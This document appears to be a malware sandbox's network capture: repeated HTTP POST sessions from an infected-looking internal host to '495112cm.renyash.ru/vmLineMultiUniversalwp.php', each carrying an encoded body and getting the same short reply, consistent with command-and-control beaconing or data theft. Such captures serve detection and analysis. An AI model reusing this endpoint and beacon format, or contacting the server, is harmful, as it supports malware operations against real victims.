                                                                                          Jan 4, 2025 11:09:07.234160900 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:07.592473984 CET2516OUTData Raw: 51 5d 5e 50 55 5f 5f 51 5c 5b 52 58 57 5a 58 5e 58 55 5a 52 52 5d 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q]^PU__Q\[RXWZX^XUZRR]Q^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*) ^%P%3*9]5=9Y08 &<<;<'[49*!Y#!Y,6
                                                                                          Jan 4, 2025 11:09:07.698348999 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:07.878041029 CET805INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gnck1JWa9sVBX4SPQAcLK5WN%2BWWpzOnncEsZtigMsedTwdMSGtxD4oFbJTXEBIeQ%2BBQkLbaLupB40SMp0Hj4yCt3ngK%2FLIN9p88w2RuIxTMOyZHprgMLYQ3DPhodWmv9ByMl3jJw"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e66c8c70c78-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3150&min_rtt=1541&rtt_var=3797&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=101262&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          110192.168.2.450118104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:08.006273031 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:08.358241081 CET2520OUTData Raw: 51 5b 5b 55 50 5e 5a 5d 5c 5b 52 58 57 5b 58 5a 58 5d 5a 5d 52 55 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[[UP^Z]\[RXW[XZX]Z]RUQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)9 +"%3(*<!">>&>?S!>?'<# =:X)!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:08.451647043 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:08.627876997 CET803INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAVyvOVbSbjtEOYXzWiEExX2aeW7aHOjgTyVYIx6BSal6XP6trwGQ6O4sT1Iuy6yLcufa0DnqddE%2Bbr%2BYG5ficJTHHqqRwBQsrsaptJ4WShuwjUlB8HohBYXx4qRT7h%2ByDJhUUZy"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e6b8c4343c4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1682&rtt_var=654&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=868014&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          111192.168.2.450119104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:08.749919891 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:09.108198881 CET2520OUTData Raw: 54 5c 5e 57 50 5e 5a 5c 5c 5b 52 58 57 5d 58 52 58 57 5a 5c 52 54 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^WP^Z\\[RXW]XRXWZ\RTQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*978=U&0#_>X5=!34?(( .1>;!Y#!Y,
                                                                                          Jan 4, 2025 11:09:09.202251911 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:09.380384922 CET804INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ci9lMEnfSCKTLiOZw2NLIWzXlbHI6F4yAgCxTEUv91jC0%2FT7Rcr8XFUZR5C8c2i%2BQ22QAOzbgwIj%2BL4AVHSYGalirijLtesBzQeIFDPiAqnztPyp0nVEK1bAuexrl1qkaX55OkEP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e703bfb0f5b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=561&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=981842&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          112192.168.2.450120104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:09.457957029 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          113192.168.2.450121104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:09.554349899 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:09.905021906 CET2520OUTData Raw: 51 5a 5e 5e 55 53 5f 51 5c 5b 52 58 57 5e 58 59 58 5c 5a 53 52 56 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^^US_Q\[RXW^XYX\ZSRVQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.))0 (9&;=%Y5[3>#.>R+_(64 );!Y#!Y,6
                                                                                          Jan 4, 2025 11:09:09.997996092 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:10.255259991 CET800INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IiMInv7B4vTUN0kFWsBqHGRClwaLiWaBWdqIkRhLFhhkJ67ryUOgkY1hVLvAq9OL6sijCdXIaqxt73G044BIa1hjIkfD4S8t9NHJixrm7i%2FVzpffy43boOjt8xYcKBVUve3SkX7x"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e753e1f43f3-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4422&min_rtt=1717&rtt_var=6055&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=62497&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          114192.168.2.450122104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:10.376216888 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:10.733086109 CET2520OUTData Raw: 54 5b 5b 50 50 59 5a 5d 5c 5b 52 58 57 58 58 59 58 56 5a 5c 52 50 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[[PPYZ]\[RXWXXYXVZ\RPQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:+@#+9Q%U(=<%!%]07V#.*(#(& [:X>!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:10.825119019 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:11.003950119 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkRbybBrU5UadU3aSZluRQlluReg6j8Gu9jH99OCNtrPk%2FaTt0z%2FNiJAincZ6CRJpsMabj6zWvhZtGhMiy4kkHGYMgGXMJMNlx17%2BOGjtg7CXMNFqIMYqUU%2FmiSc3YreZnzMPbsr"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e7a5f257c9a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1864&rtt_var=909&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=539541&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          115192.168.2.450123104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:11.123374939 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:11.467452049 CET2516OUTData Raw: 54 5a 5e 53 55 5b 5a 52 5c 5b 52 58 57 5a 58 58 58 56 5a 5f 52 53 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^SU[ZR\[RXWZXXXVZ_RSQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.**/C#+5V'3 =25%Z$X$4.>S),+?6;\ >==;!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:11.592358112 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:11.855746031 CET804INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4jmhAv1ls4ljcIfU5ETOzLJFVZyiwoawmeTbvuWy9nCm5p4cSYasV6Pr6F6Em5tmchE3NKzWnmfXbXJPycFSg3B3D%2FDyNde62FOqAm8ObOCUBVzgdooji%2F88%2FArT0PQG990AHEk"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e7f2fd6c351-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4723&min_rtt=1630&rtt_var=6798&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2809&delivery_rate=55344&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          116192.168.2.450124104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:11.985641956 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:12.342629910 CET2520OUTData Raw: 54 58 5b 50 55 5d 5a 54 5c 5b 52 58 57 5c 58 5e 58 51 5a 5f 52 51 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[PU]ZT\[RXW\X^XQZ_RQQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*94;)V%#(,"#>%&> ."Q(#Y*5 =:Y);!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:12.429588079 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:12.660885096 CET805INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vaZkDaJdav%2BxAi%2F%2FTMxjnmoiAA2mMUJBpZ45ifJe85eEciQFDiFZf8QrWnkqfWoMflNi8npnyeTaDNXMn00syLzMBNnN4OVPDKUDQ2xVmVBvklHD7SgdgpTn3GEc0jCp4UeeOETM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e846d6041c6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2377&min_rtt=1730&rtt_var=1943&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=211349&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          117192.168.2.450125104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:12.780848026 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:13.139362097 CET2520OUTData Raw: 54 59 5e 54 50 58 5a 55 5c 5b 52 58 57 5b 58 5b 58 5c 5a 5d 52 56 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^TPXZU\[RXW[X[X\Z]RVQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:4 "&#)<1]6>9\0>V 5<$(5<4%*!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:13.225259066 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:13.500917912 CET807INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZbQtnYrUdgSbXLYWsvas%2FbQm%2Fl0OCT7zqno9BAbXtHkM2B6As4Jo0Jndvohue3un6tsrMtBTEElSF0JS1ov66v6WOF4siRha9HuF7Ma3F5Jzj1xPxXJ%2Bv93kXK3YTh8JrXq7%2Bko"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e896d277281-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2709&min_rtt=1954&rtt_var=2243&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=182545&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          118192.168.2.450126104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:13.633030891 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:13.983128071 CET2520OUTData Raw: 51 5b 5e 53 50 5c 5a 51 5c 5b 52 58 57 53 58 5c 58 56 5a 53 52 51 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[^SP\ZQ\[RXWSX\XVZSRQQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-) ;5& <*"=[&-4!.%+0(6#7=2_=!Y#!Y,
                                                                                          Jan 4, 2025 11:09:14.098030090 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:14.359785080 CET810INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1paruiI9GviLpGbNOgtIP2r7X%2B%2BUFaim1jdlFrF8zW22M7UdzHko99XL2vQ7dORH5PqCZlOOKbsg4Ame4a%2FZWjeVttxkDYB%2Bn87WAFY01iwybCVyMVoBAwgS%2BJ3YrZ2nzmO5OFW%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e8ecf408c8f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4357&min_rtt=1901&rtt_var=5625&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=67749&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          119192.168.2.450127104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:14.488693953 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          120192.168.2.450128104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:14.570020914 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:14.920711994 CET1844OUTData Raw: 54 5c 5e 5f 55 52 5f 53 5c 5b 52 58 57 5b 58 52 58 56 5a 5b 52 5c 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
